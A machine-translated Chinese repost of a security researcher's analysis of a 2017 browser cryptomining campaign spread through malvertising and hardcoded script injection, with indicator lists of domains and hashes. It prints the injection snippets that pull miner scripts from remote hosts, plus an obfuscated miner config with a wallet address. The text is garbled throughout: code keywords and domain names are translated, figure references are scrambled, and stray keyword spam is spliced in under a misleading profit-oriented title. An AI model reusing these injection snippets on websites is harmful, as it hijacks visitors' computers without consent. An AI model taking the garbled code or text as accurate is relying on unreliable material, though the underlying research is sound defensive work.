主页 > imtoken官网地址 > 加密货币网络挖掘 - 如何挖掘:在附属公司中盈利
加密货币网络挖掘 - 如何挖掘:在附属公司中盈利
在过去的几个月里,我们偶然发现了一些明显用于直接在浏览器中挖掘加密货币的 JavaScript 文件。 很长一段时间以来,网络犯罪分子都从加密货币挖矿中获利。 然而,他们经常通过在受害者的机器上安装恶意软件或可能不需要的应用程序来骗取不诚实的钱。
在这种特殊情况下,当用户浏览某些网站时,挖矿是直接在浏览器内执行的。 因此,没有必要感染受害者的机器或利用漏洞。 所需要的只是一个支持 JavaScript 的浏览器,这是大多数浏览器的默认状态。 这篇博文描述了我们为更好地了解这种威胁而进行的研究。
我们开始深入研究遥测数据,发现部分威胁是通过恶意广告传播的。 这种 CPU 密集型任务通常被大多数广告网络禁止,因为它会大大降低用户体验。 在您的浏览器中挖掘加密货币似乎违反直觉——我们知道挖掘比特币需要大量的 CPU 能力——但正如我们稍后将看到的,网络犯罪分子选择挖掘不需要定制硬件进行加密挖掘的加密货币。 此外,通过“感染”网站比感染用户的机器更容易影响大量机器。
虽然这种不良行为可以在任何国家/地区使用,但我们注意到此特定活动主要影响了俄罗斯和乌克兰。
图 1 显示了受此威胁影响的五个主要国家。 请务必注意,此目标可能是由于脚本注入网站的语言所致,因为我们可以从美国 IP 地址访问它们。
图 1 - 根据 ESET LiveGrid® 遥测,受网络挖矿程序影响的国家/地区。
图 2 显示了 Cisco Umbrella 历史上排名前 1M 的域名之一 --reasedoper[。 ] pw - 托管这些脚本。 我们注意到在 2017 年 3 月至 2017 年 4 月期间对该域的 DNS 查询显着增加。2017 年 6 月 28 日 easedoper[。 】 私服排名26300次。 这几乎与 GitHub 相当流行的文本共享网站 GitHub Gist (gist.github.com) 处于同一水平,后者在同一天排名 26,293 次。
图 2 - Cisco Umbrella Top 1M 中的 easedoper[。 ] pw的水平。
历史
在浏览器中挖掘加密货币的想法并不新鲜。 2013 年,麻省理工学院的一群学生创立了一家名为 Tidbit 的公司,该公司提供接收比特币的在线服务。 网站管理员可以在他们的网站上包含 Tidbit 的脚本,而不是展示广告,以通过比特币挖掘来赚钱。 然而,服务创始人因未经用户同意使用用户的计算能力而被新泽西州总检察长办公室发出传票。 他们最终达成和解,但不得不放弃他们的项目。
以前比特币协议bitp,一些其他服务,如 bitp[. ],它提供了网络浏览器比特币挖掘功能。 由于使用传统 CPU 或 GPU 挖掘比特币的效率不断提高,这些服务已被关闭。 例如,bitp[. ] 该项目于 2011 年 7 月结束。
它是如何分布的
此脚本的分发方法是确定其是否合法的关键。 在这种特殊情况下,我们能够找到两种不同的方式来强制用户执行这些脚本:恶意广告和硬编码 JavaScript 片段。 图 3 显示了挖矿脚本的全球分布方案。
图 3 - 挖矿脚本的分发方案。
恶意广告
挖掘脚本的主要分发方法是恶意广告。 通常,它涉及从广告网络购买流量并分发恶意 JavaScript 而不是传统广告。 在这种特殊情况下,我们不确定脚本是要被注入还是 listat[. ] 商业是否被泄露。 然而,listat[. ] biz 真的很可疑,因为它似乎在模仿 LiveInternet Counters (LI stat),这是一个合法的网络计数器。 此外,许多可疑域已使用相同的电子邮件地址注册,包括 lmodr[,它也出现在恶意广告链中。 】 商业。
图 4 显示了 2017 年 7 月为挖矿脚本提供流量的顶级网站。我们注意到,大多数网站都是视频流或浏览器内游戏网站。 这是有道理的,因为他们的用户在看电影或玩游戏时往往会在同一个网页上花费更多时间。 此外,预计此类网页的 CPU 负载会高于正常情况,这往往会掩盖挖矿脚本带来的额外负载。 因此,它允许挖矿脚本运行更长时间并使用更多的计算能力。
图 4 - 根据 ESET LiveGrid® 遥测为挖掘脚本提供流量的网站。
网站 okino[. ] 电视似乎特别受欢迎。 在撰写本文时,它在俄罗斯的 Alexa 排名为 907,在乌克兰为 233。 其他一些网站似乎也很受欢迎,在俄罗斯的 Alexa Top 1000 中。
图 5 - Okino[. ] 电视Alexa排名。
图 6 显示了对 wotsite[. ] 网站的CPU消耗。
图 6 - 访问 wotsite[. ] 净 CPU 消耗。
上面描述的重定向链的一个具体例子在图5中。 图3提供在图2中。 7. 前三个跃点注入下一跃点提供的脚本,如图 8 所示,图 9 和图 10 中的重定向使用第一个域(在我们的例子中为 skyadsvideo1[]ru)并不总是相同。 我们还看到了 code.moviead55[。 ] 茹。 两者都解析为相同的 IP 地址,167.114.238.246 和 167.114.249.120。 根据域名skyad[. ] 视频的 Whois 数据,其域名代码.skyad[。 ] 视频也解析为相同的两个 IP 地址,这些域似乎与 SkyAdVideo 广告网络所有者相关联。
图 7 - 来自 okino[. ] tv 到挖掘脚本的重定向链。
1个
2个
3个
4个
<!--无索引-->
<分区></分区>
<script type="text/javascript" src="http://skyadsvideo1.ru/code.php?v=e225aa8e9c1a68539730f11001490407"></script>
<!--/无索引-->
图 8 - 来自 Okino[。 ] 电视主页。
1个
2个
3个
4个
varscript=document.createElement('脚本');
script.src='//lmodr[.]biz/mdstat2.php';
脚本.异步=真;
document.head.appendChild(脚本)
图 9 - 来自 Skyadsvideo1[。 ] ru/code.php 脚本(反混淆后)。
1个
2个
3个
4个
varscript=document.createElement('脚本');
script.src='//listat[.]biz/3.html?group=mdstat2_net&seoref='+encodeURIComponent(document.referrer)+'&rnd='+Math.random()+'&HTTP_REFERER='+encodeURIComponent(document.网址);
脚本.异步=真;
文档.head.appendChild(脚本);
图 10 - lmodr[. ] biz/mdstat2.php。
对 PassiveTotal 的搜索显示 listat[. ] biz 只是重定向到挖矿脚本,除了在 6 月 1 日和 7 月 5 日它还被重定向到真正的网络计数器和 anstatalsl[。 】 商业。 因此,lmodr[. ] biz 和 listat [. ] biz 好像只用来注入挖矿脚本。
1个
2个
3个
4个
5个
6个
7
functionshow_260(){
varscript=document.createElement('脚本');
script.src='//mataharirama[.]xyz/launcher.9.single.js';
脚本.异步=真;
文档.head.appendChild(脚本);
}
show_260();
图 11 - listat[. ] biz/3.html。
令人惊讶的是,我们还注意到第一跳 hopad55[。 ] ru也可以注入矿工。 它直接托管在这个网站上,可以挖掘 ZCash 加密货币。 它使用位于 ws.zstat[. ]net:8889 并通过网络套接字进行通信。 但是,我们不能在我们的代码中使用 easedoper[。 ] pw 上托管的脚本证明了相似性。 因此,不同的团体似乎试图通过使用访问者的计算能力来获利。
硬编码的 JavaScript 代码
我们还在 Google Cache 上发现了大约 60 个网站,它们注入了与图 10 中相同的 JavaScript 片段。这些网站的主页从 script.php URL 注入脚本。
1个
2个
3个
<脚本类型="文本/javascript">
document.write("<script type=text/javascript src=\""+"/script.php?group=4goodluck_org&r="+encodeURIComponent(document.referrer)+"&p="+encodeURIComponent(document.URL)+" \"><\/脚本>");
</脚本>
图 12 - 主页中的脚本注入。
该脚本调用来自不同域的 URL,包括 static.reasedoper[。 ] pw,托管用于挖矿的JS脚本。 下一节将介绍这些脚本的分析。 我们还注意到 listat[,其他注入域之一。 ]org 与 IP 活动 (listat[.]biz) 共享 IP 地址。 另一个相似之处是函数 show_260 的名称,它也用于恶意广告活动。
IOC 部分提供了受影响域名的非综合列表。 他们似乎都不是知名网站。
它如何挖掘加密货币
几个脚本托管在 static.reasedoper[. ] pw 和 mataharirama[。 ] 在 xyz 上。 名称中有多个的脚本是多线程的,而使用单个脚本的脚本只使用一个线程。 它们是启动工作人员挖掘不同加密货币的主要 javascript 文件。 这些脚本被轻微混淆:字符串文字仅使用十六进制转义序列(“\x42\x43 ...”)编写。
图 13 显示可以使用此脚本挖掘 Feathercoin、Litecoin 和 Monero。 然而,他们目前似乎并没有在开采莱特币。
1个
2个
3个
4个
5个
6个
7
8个
9
10
11
12
13
14
15
16
17
18
功能(_0xab8e5a,_0x36e7b7,_0x4c105c){
_0x36e7b7[_0x7e60('0x5')]={
'assets_domain':_0x7e60('0xee'),
'调试':!![],
'羽毛币':{
'池':_0x7e60('0xef'),
'default_wallet': '6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4'
},
'门罗币':{
'池':_0x7e60('0xf0'),
'default_wallet':_0x7e60('0xf1')
},
'莱特币':{
'水池': '',
'默认钱包':''
}
};
}
图 13 - 可以开采三个硬币。
羽毛币和莱特币是受比特币启发的加密货币。 主要区别在于它们各自使用不同的哈希算法:neoscrypt 和 scrypt。 目标是减少使用定制硬件(例如 ASIC 矿工)而不是常规 CPU 的需要。 挖掘它们不仅需要 CPU 能力,还需要大量内存。
最后一种货币门罗币不同于其他两种。 与比特币相比,它的主要特点是隐私性更高。 由于区块链是不透明的,因此很难追踪交易。 特别是,它使用环签名在多个可能的发件人地址中隐藏发件人地址。 它还为每次传输生成一个新的公钥以隐藏真正的接收者。 CryptoNight 使用的散列算法也需要大量内存。 因此,选择这种山寨币在普通机器上进行 JavaScript 挖掘是有意义的。
由于挖矿需要大量的计算能力,因此运营商决定使用 asm.js 而不是常规的 JavaScript 来实现哈希算法也就不足为奇了。 据说 Asm.js 比在 C 中常规执行这些算法慢 1.5 到 2 倍。提供了三个:scrypt.asm.js (Litecoin)、cryptonight.asm.js (Monero) 和 neoscrypt.asm.js (羽毛币)。
最后,Feathercoin 钱包地址在所有脚本中都是相同的,同时使用了几个不同的 Monero 地址。 但是,同一个地址在多个脚本之间共享; 因此,我们认为他们都属于同一个群体。 由于门罗币的主要特点是匿名性,我们无法得知钱包中存放的金额。 至于Feathercoin,这个地址在网络上是看不到的。 我们不确定这个原因,但可能是由于使用了矿池。
与以前的网络矿工联系
在挖矿脚本中,我们发现了一个硬编码的 Feathercoin 地址,6nmfjYVToBWb2ys4deasdydPj1kW9Gyfp4。 快速谷歌搜索显示该地址已使用多年。
在 2016 年初发布的一篇博文中,一位互联网用户抱怨脚本使用了 100% 的 CPU。 他们描述的内容与我们分析的内容非常相似,并且与 Feathercoin 地址相匹配。 在发现时,挖矿脚本托管在 minecrunch[. ] 公司。 优越的。 搜索这个域导致了 cryptocurrencytalk.com 上的一个线程,用户 Kukunin 在其中描述了它的“谦虚服务 - MineCrunch”。 关于性能比特币协议bitp,Kukunin 解释说:
“虽然传统的 CPU 挖矿利润太低,但以接近本地速度的分布式挖矿(成千上万的访问者)一些新的加密货币(仅 cpu 左右)可能非常可爱。
[...]
C Scrypt 矿工使用 Emscripten 编译为 Javascript 以获得最佳性能。 性能比原生 cpuminer 应用程序慢 1.5 倍左右。 “
第一篇文章 ( ) 中的链接显示了相同的 Feathercoin 地址。 这加强了 easedoper[. ]pw 矿工和 minecrunch[。 ] 公司。 之间的关系。 然而,如果 MineCrunch 的目标是提出分布式挖矿的开放服务,easedoper[. ] pw 显然只会使 MineCrunch 的作者(或硬编码地址的所有者)受益,因为它不太可能指定成员标识符。
综上所述
尽管使用 JavaScript 矿工而不是本机程序会对性能造成影响,但矿工网站收到的访问者数量可能会让他们获利。 根据 Cisco Umbrella Top 1M,6 月,easedoper[。 ] pw 的 DNS 查询与 gist.github.com 一样多。
尽管它可以被视为传统广告的替代品,但未经用户同意,这种行为是不可取的。 新泽西州消费者事务部辩称,未经用户同意在用户机器上挖掘比特币等同于获得对计算机的访问权限。 因此,这些服务的开发者应该在开始挖矿之前清楚地做广告,这在使用恶意广告的分发方案中显然不是这样。
最后,用户可以通过在浏览器中安装配置良好的广告拦截器或脚本拦截器插件来保护自己免受这种威胁。 ESET 用户可以通过启用潜在不安全应用程序检测(检测为 JS/CoinMiner.A 潜在不安全应用程序)来保护自己免受这些恶意脚本的侵害。
国际石油公司
挖掘和恶意广告 URL
域URL注
static.reasedoper.pw
static.reasedoper[.]pw/launcher.0.single.js
static.reasedoper[.]pw/launcher.1.single.js
static.reasedoper[.]pw/launcher.2.single.js
static.reasedoper[.]pw/launcher.0.multi.js
static.reasedoper[.]pw/launcher.1.multi.js
static.reasedoper[.]pw/launcher.2.multi.js
[…]
托管挖掘脚本的网站。
马塔哈里拉马 [.]xyz
mataharirama[.]xyz/launcher.9.single.js
easedoper 的副本。 他们共享 2 个 IP 地址:
• 163.172.162.231
• 163.172.153.226
列表[.]商业
listat[.]biz/3.html
重定向到 easedoper[.]pw 或 mataharirama[.]xyz。
lmodr[.]商业
lmodr[.]biz/mdstat.php
重定向到 listat[.]biz
散列
哈希(SHA-1)文件名检测名
fa2f4cf2f38383477a0a78d7e3d0841f254c5adf
launcher.0.multi.js
b9cd68313b72deac23a53f44ae68598ec139ad27
launcher.0.single.js
e44c502ff69b6bbe291e8125304203af0f675aa3
launcher.1.multi.js
7ce2fb5cea77cbd38cd54533bce81d1b0b0d7a82
launcher.1.single.js
3b28b5f079f6d2bdaa028b31a2b5fa9734f832f2
launcher.2.multi.js
51b97b46fe53cc5aaedc3f45d6517a74008ca9cd
launcher.2.single.js
38ccae4555505c8d5f36a9d9c9a20fe80a11304a
launcher.3.multi.js
2aa56f945c7d3805d3ee7851cdd4e932f1cd3160
launcher.3.single.js
ae6fe31b8355a3e70d6bf6c89ff7ae18c8de41d0
launcher.4.single.js
fc7e8fb976cc260ceb680e10713e4640b23dde79
launcher.4.multi.js
d5482f2f7bab8a8832f65f6ba5dc2edc5e19687f
launcher.5.multi.js
b5d475d9c084d652faabe3888bbda5b673ebe9dd
launcher.5.single.js
626646c572211e157dceeb4b918b9f46c3c656f5
launcher.6.single.js
3c70b32180c2e6ae39006eee867135650c98cfa0
launcher.6.multi.js
80c11eb331758a4d6d581ddcb5ebeca9410afe93
launcher.7.multi.js
52317c0abdc69f356dd2865c1fd35923f8beb7d3
launcher.7.single.js
31d40684cd765ef6625fd9a03d2522d84f0ca79b
launcher.8.single.js
JS/投币机。 潜在不安全的应用程序
9bc931ec55d1fed45bec1c571a401f4a201a02cf
launcher.8.multi.js
afae4cf246125671b7eae976c7329b4e0729e109
launcher.9.multi.js
3ac2e2d827e39bd802d5e3f7619099696bc38955
launcher.9.single.js
c4c5f13f0250364bd1321d038d56dbf1a97154f8
launcher.10.single.js
29695469e53822602d9b1884c2268a68e80df999
launcher.10.multi.js
b34216ee46ea1355cbc956514012e74ff9712129
launcher.11.multi.js
9394db4ba0ee70673d451547fd4ae40bfea6112d
launcher.11.single.js
6f0bf3fa4dea541a7293b89661d539bb602218c6
launcher.12.single.js
3512351bd8903ae82cc1162fed4faaafceba893d
launcher.12.multi.js
5adf5146a84699b6aca5e9da52bb629bceaa7726
launcher.13.single.js
8c45141791b94e172fd5ad8eaefebe5ebb8e729c
launcher.13.multi.js
519928629becb1f8b18a56609b03d4cea3c52ddd
launcher.14.multi.js
c5629530af39c99c25f83baee7db4a24a9d0aa03
launcher.14.single.js
bf3a1151bc4f8188f735583257ecbbd1eaff123f
launcher.15.multi.js
6e5d2b1b9f1140079f3b48edec09c8515e77e14d
launcher.15.single.js
12b1bfd6b49c02f928f0429f1505d114583c213c
monero.worker.js
885f102c9d4dd2e286401756ca265e4aa3f7a664
scrypt.worker.js
具有硬编码注入脚本的域
1个
2个
3个
4个
5个
6个
7
8个
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
二十四
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
全天[.]在[.]ua
anekbook[.]ru
自行车[.]co[.]ua
cg实验室[.]ru
dikobras[.]com
教义 62[.]ru
ekavuz[.]ru
fenix-45[.]ru
ipnalog[.]ru
jobochakov[.]com
哈尔科夫阿伦达[.]com[.]ua
库兹多斯卡[.]ru
laminirovanievolos[.]ru
马林鱼群[.]ru
mat4ast[.]com
大生活[.]网
米尔斯蒂霍夫[.]ru
穆尼鲁法[.]ru
murlyka[.]net[.]ua
新闻通讯[.]ru
奥巴德[.]ru
奥格姆斯[.]ru
意见博客[.]ru
optiplast[.]ru
otdamprimy[.]ru
pcook[.]ru
pogelanie[.]信息
邮政银行[.]ru
程序电视[.]ru
psinovo[.]ru
酷航俱乐部[.]ru
ska4ka[.]com
斯蒂希[.]
斯蒂霍斯洛夫[.]ru
副车[.]org
sumytex[.]in[.]ua
suntehnic[.]ru
td-经典[.]ru
trbook[.]com[.]ua
vstupino[.]su
x-运动[.]信息
